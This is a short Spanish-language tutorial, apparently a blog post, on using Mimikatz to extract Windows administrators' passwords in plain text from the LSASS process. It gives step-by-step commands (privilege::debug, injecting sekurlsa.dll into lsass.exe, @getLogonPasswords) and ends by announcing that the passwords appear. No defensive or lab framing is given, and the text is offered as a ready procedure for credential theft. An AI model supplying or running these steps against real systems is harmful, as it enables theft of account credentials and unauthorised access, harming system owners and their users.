INTRODUCCIÓN
Mimikatz es un programa del desarrollador francés Gentil Kiwi que entre otras características nos permitirá descifrar las contraseñas de los administradores en texto plano de un sistema Windows, en resumen, si se disponen de permisos de debug sobre el proceso LSASS, esta herramienta inyecta una librería y obtiene la contraseñas en claro de dos proveedores de autenticación por defecto (Tspkg y Wdigest) que almacenan las credenciales de los usuarios de forma reversible.
PASOS
1. Descargamos Mimikatz .
2. Lo ejecutamos como administrador.
3. Escribimos privilege::debug y presionamos Enter.
4. Escribimos inject::process lsass.exe sekurlsa.dll y presionamos Enter.
5. Escribimos @getLogonPasswords y presionamos Enter.
¡Y listo! Ahí nos aparecen las contraseñas de los administradores del sistema.
FUENTE